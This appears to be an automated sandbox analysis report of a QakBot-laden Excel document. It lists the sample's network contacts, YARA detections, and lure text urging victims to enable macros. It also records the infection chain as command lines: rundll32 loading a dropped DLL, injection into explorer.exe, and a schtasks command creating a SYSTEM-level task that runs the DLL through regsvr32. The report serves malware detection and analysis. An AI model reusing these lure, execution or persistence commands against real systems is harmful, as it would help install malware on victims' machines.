Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://lifecycle.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://login.windows.local
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://management.azure.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://management.azure.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://messaging.office.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ncus.contentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://officeapps.live.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://onedrive.live.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office365.com/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://settings.outlook.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://staging.cortana.ai
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://tasks.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://wus2.contentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 9B0D8C85-82C2-4C91-AEDC-B9459681EEEA.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.4:49734 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot Payload Author: kevoreilly
Source: 5.2.explorer.exe.ec0000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
Source: 5.2.explorer.exe.ec0000.0.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
Source: 1.3.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPEMatched rule: QakBot Payload Author: kevoreilly
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above RunDLL X 12 13_ Once You have Enable Editing, pIe'
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O ' WHY I CANNOT OPEN THIS DOCUMENT ? W You are using
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 9659e9a8_by_Libranalysis.xlsInitial sample: CALL
Source: 9659e9a8_by_Libranalysis.xlsInitial sample: CALL
Source: 9659e9a8_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 9659e9a8_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Office process drops PE fileShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\ritofm.cvm
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ue[1].htmJump to dropped file
Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBGJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105822A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057050
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105538D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_010587CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01053000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01054910
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01055223
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057A3B
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01056743
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01053943
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01058B55
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_0105565A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01054F63
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01057F75
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01053271
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01059571
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01059A7C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_010555AE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_010535CD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01054CCB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_010568D7
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_010598ED
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01056BEE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_01058DF9
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ECBCF0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED54C8
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED88CA
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EDD0AF
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EC704E
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED5422
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EC69ED
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED91C0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED85D0
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ECC590
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED3AA2
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EC7295
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED2A55
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED7A02
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EDCE1C
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EDF615
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EC77E7
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED5B9C
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00EC6F2A
Source: 9659e9a8_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
Source: ritofm.cvm.5.drStatic PE information: No import functions for PE file found
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: 00000001.00000003.708454273.00000000049F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.explorer.exe.ec0000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.3.rundll32.exe.49f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 5.2.explorer.exe.ec0000.0.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: 1.3.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPEMatched rule: QakBot author = kevoreilly, description = QakBot Payload, cape_type = QakBot Payload
Source: classification engineClassification label: mal100.expl.evad.winXLS@18/18@2/2
Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00ED6E91 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,BitBlt,SysAllocString,CoSetProxyBlanket,
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{F2216F8D-EF73-42B8-8E37-A58300A73E42}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_01
Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{D936A919-3D95-457D-8424-47B43B8FC3B5}
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess5132
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\WERReportingForProcess4780
Source: C:\Windows\SysWOW64\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\{D936A919-3D95-457D-8424-47B43B8FC3B5}
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{71F94E0F-2F67-4E94-BECF-B06A373927A8} - OProcSessId.datJump to behavior
Source: 9659e9a8_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 652
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 652
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn frjwqvc /tr 'regsvr32.exe -s \'C:\Users\user\ritofm.cvm\'' /SC ONCE /Z /ST 13:34 /ET 13:46
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\ritofm.cvm'
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: ole32.pdb& source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdbB source: WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: regsvr32.pdbk source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb4 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: propsys.pdb8 source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886140821.0000000003896000.00000004.00000040.sdmp
Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.738961075.0000000003F50000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.886126177.0000000003890000.00000004.00000040.sdmp
Source: Binary string: wsspicli.pdb> source: WerFault.exe, 0000000F.00000003.738986461.0000000003F56000.00000004.00000040.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000F.00000003.738934678.0000000003E31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.886105989.00000000038C1000.00000004.00000001.sdmp
